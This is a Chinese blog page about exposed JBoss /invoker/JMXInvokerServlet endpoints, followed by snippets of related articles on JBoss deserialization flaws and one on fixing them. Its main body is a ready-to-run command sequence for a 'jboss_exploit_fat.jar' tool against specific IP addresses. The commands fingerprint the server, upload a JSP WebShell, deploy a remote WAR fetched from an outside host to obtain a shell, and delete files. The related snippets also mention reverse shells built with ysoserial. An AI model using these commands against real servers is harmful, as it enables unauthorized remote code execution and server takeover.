JBoss服务器 /invoker/JMXInvokerServlet/ 接口对外开放

最新推荐文章于 2024-09-23 20:36:41 发布
最新推荐文章于 2024-09-23 20:36:41 发布
阅读量4.1k 收藏
点赞数
分类专栏: security 文章标签: jboss hacker

JBoss服务器的/invoker/JMXInvokerServlet/接口对外开放,hacker通过此接口进行远程部署WebShell,可进一步对服务器进行控制。


文件上传导致任意代码执行

http://www.wooyun.org/bugs/wooyun-2010-031621

jboss_exploit_fat
09-06
1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean $content$内容是同目录下的shell.jsp文件内容 即:将shell.jsp文件上传到服务器上,最终部署的war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: http://192.168.7.84:10081/test/shell.jsp 5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 6.支持输入用户名和密码 带验证的情况 java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 7.支持代理模式 java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
JBoss JMXInvokerServlet 反序列化漏洞
Kevin's Blog
06-08 2601
一、漏洞介绍 1.1 漏洞简介   经典的JBoss反序列化漏洞,JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象存在反序列化漏洞。 1.2 影响版本 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.
JBoss EJBInvokerServlet CVE-2013-4810 反序列化漏洞
最新发布
2301_81881972的博客
09-23 368
此漏洞存在于JBoss中 /invoker/JMXInvokerServlet 路径。使⽤JavaDeserH2HC进⾏反弹shell。#监听 6666 端⼝。#创建class⽂件。
JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501 已亲自复现
qq_42430287的博客
12-23 1588
如果payload请求成功,在响应头中返回的状态码为200,在响应体中抛出 org.jboss.invocation.InvocationException异常信息,则需要结合网络日志和流量日志进行分析。如果返回其他状态码,则攻击失败。
vulhub中JBoss JMXInvokerServlet 反序列化漏洞复现
yougexiaojiuguan的博客
03-03 245
漏洞复现的记录
深入浅出带你学习JBoss中间件常见漏洞
Spontaneous_0的博客
02-13 1164
深入浅出带你学习JBoss中间件常见漏洞
java.lang.NoClassDefFoundError: org/jboss/logging/
03-14
Java编程中的`java.lang.NoClassDefFoundError: org/jboss/logging/`是一个常见的运行时错误,通常发生在尝试执行一个类时,JVM无法找到在编译时已经存在的类定义。这个错误并不意味着类在编译期间不存在,而是表明...
WildFly 以前称作JBoss java程序应用服务器工具
11-22
WildFly,正式名称为JBoss Application Server(JBoss AS),是一个Java Enterprise Edition全功能应用服务器。它由Red Hat设计和维护,专注于提供运行Java Web应用程序所需的所有必要功能。此外,WildFly是JBoss...
Apache Jboss/Tomcat集群(手稿)
10-26
总结来说,Apache JBoss/Tomcat集群的搭建涉及多个组件的配置和集成,包括前端的Apache服务器、后端的应用服务器和中间的连接器。通过这种方式,系统能够有效地处理高流量,提高服务的可用性和响应时间,同时通过...
appServer JBoss / jboss / Wildfly 8.1 / wildfly 8
06-10
描述中提到的"NULL"可能意味着没有具体的描述信息,但我们可以从标签 "源码" 和 "工具" 中推测,这个压缩包可能包含与JBoss/Wildfly 8.1相关的源代码或实用工具。源码对于开发者来说极其重要,因为它允许他们深入...
jboss服务器default/deploy
01-05
jboss服务器启动,bin文件夹下的run.bat脚本, mvn clean install mvn jetty:run
JBoss JMXInvokerServlet 反序列化漏洞复现
W小哥
05-26 1831
一、漏洞描述 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Da
如何修复JBoss EJBInvokerServlet / JMXInvokerServlet 漏洞
05-17 1001
漏洞描述: EJBInvokerServletJMXInvokerServlet Servlet中存在一个远程执行代码漏洞。未经身份验证的远程攻击者可以通过特制请求利用此漏洞来安装任意应用程序。 https://192.168.xxx.22/invoker/EJBInvokerServlet https://192.168.xxx.22/invoker/JMXInvokerServlet ...
JBoss中间件漏洞汇总
热门推荐
混子
11-18 1万+
目录 一、JBoss是什么? 二、安装环境 1. Jdk 2. 下载JBoos4、6,并进行配置 三、 反序列漏洞 1. HttpInvoker 组件(CVE-2017-12149) 2. JMXInvokerServlet组件(CVE-2015-7501) 3. JBossMQ(CVE-2017-7504) 4.EJBInvokerServlet组件(CVE-2013-4810) 四、 War后门文件部署 1. admin-cosole(爆红接着传) 2. JMX-console.
JBoss JMXInvokerServlet 反序列化漏洞复现(CVE-2015-7501)
wutiangui的博客
09-11 577
JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问:8080/invoker/JMXInvokerServlet,返回如下页面(下载文件),说明接口开放,此接口存在反序列化漏洞。执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。然后,将生成的exp复制到JavaDeserH2HC-master目录方便下一步利用。
jboss7中用axis2对外发布webservice接口
jerry_player的博客
08-18 1272
今天在迁移查询接口的时候,遇到一个问题:在jboss7中发布的webservice接口访问不到(404),应该是某个地方的配置出了问题,下面详细介绍一下配置 1、涉及到的jar包:axis2-adb-1.5.4.jar        axis2-adb-codegen-1.5.4.jar    axis2-codegen-1.5.4.jar        axis2-java2wsdl-1.5.
JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501和CVE-2017-12149)
来到了学渣的博客
08-29 5334
JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。 CVE-2017-12149适用JBoss版本:5.x / 6.x 踩坑提醒:生成的ser文件最好在linux系统操作,windows会出现各种错误,甚至shell反弹不回来。 步骤: 发现漏洞指纹→反弹shell进行编码→用ysoserial把编码好的反弹shell生ser文件→启动监听→用curl或
pache Tomcat 1.1/JBoss 4.0.2/JBoss Application Server 4.0.2
05-13
这三个都是 Java EE 应用服务器,用于托管 Java Web 应用程序。其中 Tomcat 更加轻量级,适合简单的 Web 应用,而 JBoss AS 则提供了更丰富的功能,适合大规模企业级应用开发。JBoss AS 在基础上还提供了更多的企业...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值